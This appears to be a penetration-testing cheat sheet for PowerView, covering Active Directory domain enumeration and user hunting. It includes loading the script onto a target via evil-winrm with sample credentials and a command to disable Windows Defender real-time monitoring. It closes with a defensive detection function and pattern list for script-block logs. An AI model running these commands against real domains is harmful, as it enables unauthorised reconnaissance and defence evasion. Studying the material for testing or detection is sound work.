Power View

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows “net *” commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality. Several functions for the enumeration and abuse of domain trusts also exist.

#Download script

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

#Kali default location : /usr/share/windows-resources/powersploit/Recon/PowerView.ps1

#Transfer to target --> see "File transfers" section in "Exploitation" node.

As an alternative, copy the script to the current directory and load it through evil-winrm (-s sets the local scripts directory).

cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .

evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .

#Import module --> Import-Module .\PowerView.ps1

#Disable protection if needed

Set-MpPreference -DisableRealtimeMonitoring $true

#Enumerate Domain

#Get Current Domain: 
Get-NetDomain

#Enum Other Domains: 
Get-NetDomain -Domain <DomainName>

#Get Domain SID: 
Get-DomainSID

#Get Domain Policy: 
Get-DomainPolicy

#Show the domain policy settings for system access or Kerberos
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"

#Get Domain Controllers:
Get-NetDomainController
Get-NetDomainController -Domain <DomainName>

#Enumerate Domain Users:
Get-NetUser
Get-NetUser -SamAccountName <user> 
Get-NetUser | select cn
Get-UserProperty

#Check last password change
Get-UserProperty -Properties pwdlastset

#Search for a specific "string" in a user's attribute
Find-UserField -SearchField Description -SearchTerm "redcliff"

#Enumerate users logged on to a machine
Get-NetLoggedon -ComputerName <ComputerName>

#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>

#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName

#Enumerate Domain Computers

Get-NetComputer -FullData
Get-DomainGroup

#Enumerate Live machines 
Get-NetComputer -Ping

#Enumerate Groups and Group members

Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>

#Enumerate the members of a specified group of the domain

Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member

#Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences

Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName

#Enumerate Shares

#Enumerate Domain Shares
Find-DomainShare

#Enumerate Domain Shares the current user has access to
Find-DomainShare -CheckShareAccess

#Enumerate Group policies

Get-NetGPO

# Shows active Policy on specified machine
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPOGroup

#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <ComputerName>

#Enumerate Domain Trust

Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>

#Enumerate Forest trust

Get-NetForestDomain
Get-NetForestDomain -Forest <ForestName>

#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain -Forest <ForestName>

#Map the Trust of the Forest
Get-NetForestTrust
Get-NetForestTrust -Forest <ForestName>

#Hunting for Users

#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose

#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose

#Find computers where a Domain Admin OR a specified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth

#Confirming admin access:
Invoke-UserHunter -CheckAccess
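
The defender's view of the commands above, as an added example that is not from the original page or from PowerSploit: because PowerView is pure PowerShell, its function names appear in script block logging (Event ID 4104), and this filter flags records that reference them or the Defender real-time monitoring change. `Find-PowerViewIndicator`, the record shape (TimeCreated, Computer, ScriptBlockText) and the sample records are assumptions made for the illustration.

```powershell
# Added example (not from the page or PowerSploit). Names are the functions this
# page lists; Find-PowerViewIndicator and the sample records are hypothetical.
$PowerViewNames = @(
    'Get-NetDomain', 'Get-DomainSID', 'Get-DomainPolicy', 'Get-NetDomainController',
    'Get-NetUser', 'Get-UserProperty', 'Find-UserField', 'Get-NetLoggedon',
    'Get-NetSession', 'Find-DomainUserLocation', 'Get-NetComputer', 'Get-DomainGroup',
    'Get-NetGroupMember', 'Get-DomainGPOLocalGroup', 'Find-DomainShare', 'Get-NetGPO',
    'Get-NetGPOGroup', 'Find-GPOComputerAdmin', 'Get-NetDomainTrust',
    'Get-NetForestDomain', 'Get-NetForestTrust', 'Find-LocalAdminAccess',
    'Invoke-EnumerateLocalAdmin', 'Invoke-UserHunter'
)

function Find-PowerViewIndicator {
    param(
        # Expects objects with TimeCreated, Computer and ScriptBlockText properties.
        [Parameter(Mandatory, ValueFromPipeline)]
        [psobject]$Record
    )
    begin {
        # Whole-name, case-insensitive match so Get-NetDomain does not hide
        # Get-NetDomainController and unrelated longer names are not flagged.
        $escaped  = $PowerViewNames | ForEach-Object { [regex]::Escape($_) }
        $nameRx   = [regex]::new('(?i)(?<![\w-])(' + ($escaped -join '|') + ')(?![\w-])')
        $tamperRx = [regex]::new('(?i)Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b')
    }
    process {
        $text   = [string]$Record.ScriptBlockText   # null becomes an empty string
        $hits   = @($nameRx.Matches($text) | ForEach-Object { $_.Value } | Sort-Object -Unique)
        $tamper = $tamperRx.IsMatch($text)
        if ($hits.Count -gt 0 -or $tamper) {
            [pscustomobject]@{
                TimeCreated    = $Record.TimeCreated
                Computer       = $Record.Computer
                Functions      = $hits -join ', '
                DefenderTamper = $tamper
            }
        }
    }
}

# Constructed records standing in for script block logging events (Event ID 4104).
$samples = @(
    [pscustomobject]@{ TimeCreated = '2024-01-01 10:00:00'; Computer = 'WS01'; ScriptBlockText = 'Get-ChildItem C:\Temp' }
    [pscustomobject]@{ TimeCreated = '2024-01-01 10:02:11'; Computer = 'WS01'; ScriptBlockText = 'Set-MpPreference -DisableRealtimeMonitoring $true' }
    [pscustomobject]@{ TimeCreated = '2024-01-01 10:03:40'; Computer = 'WS01'; ScriptBlockText = 'Get-NetDomainController; Invoke-UserHunter -CheckAccess' }
)
$samples | Find-PowerViewIndicator | Format-Table -AutoSize
```

On a live host with script block logging enabled, the records can be built from `Get-WinEvent` against the `Microsoft-Windows-PowerShell/Operational` log filtered to Id 4104. Name matching only catches unmodified copies of the script, so treat it as one signal alongside LDAP query volume and session-enumeration telemetry.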
